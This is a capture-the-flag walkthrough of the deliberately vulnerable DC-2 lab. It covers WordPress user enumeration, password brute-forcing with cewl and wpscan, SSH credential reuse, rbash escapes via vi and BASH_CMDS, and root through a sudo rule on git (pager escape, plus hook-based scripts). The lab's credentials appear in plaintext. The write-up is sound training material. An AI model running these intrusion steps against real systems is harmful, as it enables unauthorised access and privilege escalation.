Download
- DC-2.zip (Size: 847 MB)
- Download: http://www.five86.com/downloads/DC-2.zip
- Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
- Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent (Magnet)
Description
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
As with the original DC-1, it's designed with beginners in mind.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Just like with DC-1, there are five flags including the final flag.
And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.
In short, the only flag that really counts, is the final flag.
For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.
I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
Walkthrough
flag1
First, probe the open ports with nmap.
Two ports are open: 80 and 7744, and 7744 is SSH, moved off its default port. Port 80 redirects to http://dc-2/, so visiting the IP address directly fails.
Add the line 192.168.162.169 dc-2 to the local hosts file and the site loads.
The flag1 page is linked from the home page, and it carries the next hint:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
flag2
The first hint points at cewl: crawl the site to build a password list from its own words. Kali ships cewl, so:
cewl http://dc-2/ -w passwd.txt
The home page shows the site runs WordPress, so look for the admin login. The WordPress login page is wp-login.php, and http://dc-2/wp-login.php loads it.
Next, enumerate usernames with wpscan, also shipped with Kali:
wpscan --url http://dc-2/ -e u
It finds three users; save them to user.txt:
admin
jerry
tom
Finally, run a password attack with the two lists:
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
jerry and tom both have passwords in the cewl list:
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
Logging in to the dashboard as jerry works.
flag2 is in the Pages list, together with the next hint:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
flag3
The second hint says that if WordPress can't be exploited, there is another way in. Most of the admin functionality in this WordPress install has been removed, so there is no getting a shell through the dashboard. SSH was deliberately moved to port 7744, which suggests the WordPress credentials are meant to be reused there, and indeed tom's password logs in over SSH.
The shell is an rbash (restricted bash), though, and most commands are unavailable.
Some quick testing shows that vi does work.
compgen -c
lists the commands that are available, and vi appears there too.
So open flag3.txt in vi to get flag3 and the next hint:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
flag4
The hint says to su to jerry, so flag4.txt is presumably in jerry's home directory. Reaching it means running cd, which rbash blocks, so the restricted shell has to be escaped first.
Alternatively, vi can simply open ../jerry/flag4.txt and read flag4 directly. Still, escape rbash now, since the later steps need a full shell anyway.
Use vi to spawn a shell:
:set shell=/bin/bash
:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
The PATH inherited from rbash is deliberately minimal, so reset it to the normal directories and commands run as usual.
Alternatively, assign a shell to an entry of the BASH_CMDS array and invoke it, then reset PATH the same way:
BASH_CMDS[a]=/bin/sh;a
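An added example, not from the original write-up, that probes an rbash jail the way tom's shell was probed by hand above. It assumes a local bash binary: "bash -r" starts bash in restricted mode, which is exactly what an rbash login shell is, so the checks run offline against a throwaway jail. The escape candidate list (vi, less, awk, python and friends) and the jail PATH passed to it are the example's own assumptions.

```shell
# Added example, not from the original write-up: probe an rbash jail the way
# tom's shell on DC-2 was probed by hand. "bash -r" starts bash in restricted
# mode, which is exactly what an rbash login shell is. Assumes bash is
# installed locally; everything runs offline.

# rbash_blocks CMD: succeed (exit 0) when restricted bash refuses to run CMD.
rbash_blocks() {
    ! bash -r -c "$1" >/dev/null 2>&1
}

# rbash_probe: report which classic rbash restrictions are in force. These
# four are why "cd", running a shell by absolute path, editing PATH and
# writing files with ">" all fail in tom's shell.
rbash_probe() {
    for cmd in 'cd /' 'PATH=/usr/bin' '/bin/sh -c true' 'echo x >/dev/null'; do
        if rbash_blocks "$cmd"; then
            printf 'blocked: %s\n' "$cmd"
        else
            printf 'allowed: %s\n' "$cmd"
        fi
    done
}

# rbash_escape_candidates JAIL_PATH: what "compgen -c" shows from inside a
# jail whose PATH is JAIL_PATH, filtered to programs known to spawn a shell
# (the candidate list is this example's assumption; vi is what DC-2 leaves in).
rbash_escape_candidates() {
    bash_bin=$(command -v bash)
    PATH="$1" "$bash_bin" -c 'compgen -c' | sort -u \
        | grep -E '^(vi|vim|view|nano|ed|less|more|man|awk|find|python[0-9.]*|perl|ssh|scp)$' \
        || true
}

# Escapes used on DC-2 once a candidate is found:
#   vi    ->  :set shell=/bin/bash   then   :shell
#   bash  ->  BASH_CMDS[a]=/bin/sh;a   (newer bash releases may refuse the
#             assignment in restricted mode; test it on the target)
# Both inherit the jail's PATH, so follow with:
#   export PATH=/usr/sbin:/usr/bin:/sbin:/bin

rbash_probe
```

Run the probe first; if every line says "blocked", the jail is a standard rbash and the escape has to come from a program that can itself launch a shell, which is what the second function enumerates from the jail's PATH.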
With a working shell, cd into jerry's home directory, where flag4.txt and the next hint are:
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
flag5
The last hint doesn't say so outright, but clearly a privilege escalation is needed to read the final flag in root's home directory.
First spawn a proper tty with python so the shell is easier to work with:
python -c "import pty;pty.spawn('/bin/bash')"
sudo -l shows that tom has no sudo rights.
So switch to jerry with su jerry; the password is adipiscing.
Running sudo -l again shows that jerry may run git as root, so the last step is a git privilege escalation. There are two ways to do it:
sudo git help config
then, at the pager prompt, type !/bin/bash (or !'sh') to get a root shell. Or:
sudo git -p help
!/bin/bash
Both work the same way: git opens its output in a pager (less), and less's ! command runs a shell command as the pager's own user, which under sudo is root.
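An added example, not from the original write-up, showing why a sudo rule for git is a root shell in disguise. The pager route used above needs a tty, so the example goes beyond the page and demonstrates the non-interactive variant, a repository hook, running as the current user. It assumes git is installed; the demo repository, the hook contents and the marker file are constructed under a temporary directory so it runs offline and without sudo.

```shell
# Added example, not from the original write-up. jerry's sudo rule lets him
# run git as root, and git runs helper programs as whoever invoked it: the
# pager that "git help" / "git -p help" opens, and the hooks of any repo it
# commits to. Assumes git is installed; the demo repo and marker file are
# created under a temporary directory so it runs offline and without sudo.

# Interactive route (the one used on DC-2, needs a tty). less's "!" runs a
# shell command, and under sudo that command runs as root:
#   sudo git -p help        ->  at the pager prompt type  !/bin/sh
#   sudo git help config    ->  same prompt, same escape
# Non-interactive route: git executes .git/hooks/pre-commit on every commit
# and checks nothing about the hook beyond it being executable, so
#   sudo git -C "$repo" commit --allow-empty -m x
# runs attacker-written hook code as root. Newer git releases may refuse a
# repo owned by a different user (safe.directory) when run under sudo;
# DC-2's git predates that check.

# git_hook_runs REPO MARKER: create REPO with a pre-commit hook that writes
# the output of `id` to MARKER, make one empty commit, succeed if the hook ran.
git_hook_runs() {
    repo="$1"
    marker="$2"
    git init -q "$repo" || return 1
    mkdir -p "$repo/.git/hooks"
    printf '#!/bin/sh\nid > "%s"\n' "$marker" > "$repo/.git/hooks/pre-commit"
    chmod +x "$repo/.git/hooks/pre-commit"
    git -C "$repo" -c user.name=probe -c user.email=probe@example.invalid \
        commit -q --allow-empty -m probe >/dev/null 2>&1 || return 1
    [ -s "$marker" ]
}

# Stand-alone run: show the hook firing for the current user. Under
# "sudo git -C ... commit" the marker would instead contain uid=0(root).
demo_dir=$(mktemp -d)
if git_hook_runs "$demo_dir/repo" "$demo_dir/marker"; then
    echo "hook ran as: $(cat "$demo_dir/marker")"
fi
```

The lesson for the defender is the same as for the attacker: a sudo rule on git (or any tool that spawns pagers, editors or hooks) is equivalent to a sudo rule on a shell, and should be replaced by a narrowly scoped wrapper script or dropped.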
After escalating, read the last flag in /root:
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.